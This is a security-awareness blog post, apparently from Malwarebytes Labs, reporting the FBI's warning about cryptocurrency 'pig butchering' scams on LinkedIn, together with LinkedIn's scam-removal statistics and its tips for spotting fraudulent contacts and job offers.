Digital currency fraud is a growing issue on social media, and LinkedIn is no different. In fact, according to according to Sean Ragan, the FBI’s special agent in charge of the San Francisco and Sacramento, California, field offices, cryptocurrency scams are big business on LinkedIn.

> “It’s a significant threat. This type of fraudulent activity is significant, and there are many potential victims, and there are many past and current victims.”

**How cryptocurrency scams work on LinkedIn**

Aspects of LinkedIn cryptocurrency scams share similar traits with fraud attempts on other platforms:

*   Someone messages you out of the blue. They begin with small talk, and eventually work their way up to cryptocurrency conversation. They claim that, yes, they can help you make big money from certain investments.
*   LinkedIn is generally seen as a trusted platform, reinforced by people’s perception as the go-to place for business related dealings. This is one advantage it has over less formal sites.
*   Victims are directed to genuine cryptocurrency investment portals. Though no further details are provided in the article, this can go one of two ways. Either the victim invests with their own cash, or the scammer sends them some funds to get started.
*   Weeks or months down the line, the scammer has the victim transfer funds to a site controlled by the scammer. At this point, funds are drained and the cash disappears along with the con-artist.

**Scammers take the well-worn path to riches**

The FBI notes that this type of fraud is on the rise, and draws a parallel with romance scams. In both cases, the end result is the same: loss of funds. However, this style of cryptocurrency fraud has its origins elsewhere and the connection to romance fraud is quite relevant.

This style of attack is called the “pig butcher” scam. It involves a so-called “fattening up” of the pig (target) with messages of affection. Eventually, the same jump-off into cryptocurrency investment takes place. The money, as always, vanishes. One of the key features of this attack is the pretence of accidental communication. Golf is popular, as are messages about luggage and airports.

The tactics used on LinkedIn almost certainly match up in various ways. If they can just get you to the investment site and have you deposit some funds: they’ve got you.

**Linkedin take fraudsters to task**

The team at LinkedIn point out that 96% of detected fake accounts and 99.1% of spam and scams are caught and removed by automated defences. That’s somewhere in the region of 70 million scam messages removed between July to December in 2021. For comparison, LinkedIn removed around 60 million between January and June of 2019. It also hit a peak of removals between July to December of 2020, with a massive 91 million scams given a time out.

Additionally, 11.9 million fake accounts were stopped at registration between July and December of 2021. Around 4.4 million were restricted proactively, and 127k further accounts were restricted once members reported them.

**How to spot a scam on LinkedIn**

With regard to cryptocurrency scams themselves, LinkedIn offers the following advice. Be wary of:

*   **People asking for money who you don’t know in person**. This may include sending cash directly, cryptocurrency, gift cards, prizes, and other winnings.
*   **Job postings which sound too good to be true**. Mystery shoppers, personal assistants, company impersonators are all potential red flags. Steer clear of anything which demands money from you up front.
*   **Romantic gestures on a business-centric platform**. This is especially dubious if tied to a brand new account with few or no connections. Keep in mind that established accounts can also be compromised, and used for any of the scam attempts listed above.

Should you experience LinkedIn content you’re not sure about, don’t worry. You can report it directly to LinkedIn to investigate. Stay safe out there!

LinkedIn scams are a “significant threat”, warns FBI

The most important and interesting computer security stories from the last week.
The post A week in security (June 13 – June 19) appeared first on Malwarebytes Labs.

**RELATED ARTICLES**

June 13, 2022 - We take a look at the latest batch of vulnerabilities in Chrome requiring an update.

May 30, 2022 - Posts from the last week on Malwarebytes Labs describing all the latest news, exploits, scams, and more.

May 26, 2022 - ChromeLoader is working its way into Chrome browsers via ISO images claiming to offer cracked games. What are the dangers?

May 25, 2022 - Google has issued an update for the Chrome browser to patch 32 security issues . One of the vulnerabilities is rated as critical, so install that update as soon as you can.

May 17, 2022 - A little-used feature of web addresses is being used to obfuscate malicious phishing URLs.

Source

Malwarebytes